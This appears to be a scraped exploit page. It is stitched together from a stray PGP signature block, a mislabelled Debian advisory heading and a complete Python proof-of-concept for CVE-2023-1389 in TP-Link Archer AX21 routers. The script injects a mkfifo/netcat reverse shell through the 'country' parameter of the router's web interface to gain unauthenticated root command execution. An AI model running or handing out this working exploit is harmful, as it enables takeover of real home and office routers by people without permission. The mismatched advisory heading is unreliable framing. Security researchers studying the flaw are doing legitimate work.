z0RzLg//VXN+boskHdyaumxfcvnUf6pTh6ebU05fxKID1YmhXN155xmXDrVqkvvs  
5+qbGrNJUc89Ix2sLp/GlxC3sve4pnFe8jix/GrEN1bvc+bvDC565E6Ragcey1b+  
nB0viJZmhraXfB7VMjhlXG7Q2xxkXAYaJ5F3pvv2AWZt8/9P7We9KdQzxRpPXZSj  
0e5yVzRjo1elv2Mm6yDFNFXGc+dIxoBROSo7/6hIkPGtQyKMYdSYYmWJFQdf+szU  
4Z0lsFOGA6d1cri+I4RlxfsY3zIjZWANiKg7lR7dUzSO4q6j857zDHle2vpw5sTX  
kzXKID0am4dItKPH/gcX9lv5J8ozD2LMeebnUTmvOvBdAiVS1an5a2MI9TBo8VzL  
zdTqzwmQQHIjVY3mqVGnFupc5uxx2HStkMKHYXGyXOAapg2AecUDZrbD6rcg5kxY  
/CpSss3KHEpu8WosOCkYWhAbXOA7s6Wv6pZZ/qBtrjma2QwYK9dACL6Y2hRDIlEj  
e9X6fqc6Vqw0zosuenbnxypFJF27428Ev0ZOYKc9EdyxIVixAo2x5OnwOLyzpqaM  
f0X2DSyjCAc3zS+zxMpbRMtM8kCmz5V68RYWCzKBAZNsOmi2kWK7pkuaP1j9BEYB  
H/bo69fugJOSJppKi8GLwAnxLd7NqEXl6SBFP8CDfZJ9Rq8P1P4=  
=FLgQ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5474-1

TP-Link Archer AX21 suffers from an unauthenticated remote command injection vulnerability.

    #!/usr/bin/python3# # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection# Date: 07/25/2023# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)# Vendor Homepage: https://www.tp-link.com/us/# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0# CVE: CVE-2023-1389## Disclaimer: This script is intended to be used for educational purposes only.# Do not run this against any system that you do not have permission to test. # The author will not be held responsible for any use or damage caused by this # program. # # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the# *country* parameter of the *write* callback for the *country* form at the # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is # possible to run commands as root. Execution requires sending the request twice;# the first request sets the command in the *country* value, and the second request # (which can be identical or not) executes it. # # This script is a short proof of concept to obtain a reverse shell. To read more # about the development of this script, you can read the blog post here:# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94# Before running the script, start a nc listener on your preferred port -> run the script -> profitimport requests, urllib.parse, argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning# Suppress warning for connecting to a router with a self-signed certificaterequests.packages.urllib3.disable_warnings(InsecureRequestWarning)# Take user input for the router IP, and attacker IP and portparser = argparse.ArgumentParser()parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")args = parser.parse_args()# Generate the reverse shell command with the attacker IP and portrevshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")# URL to obtain the reverse shellurl_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"# Send the URL twice to run the command. Sending twice is necessary for the attackr = requests.get(url_command, verify=False)r = requests.get(url_command, verify=False)

Tag

#auth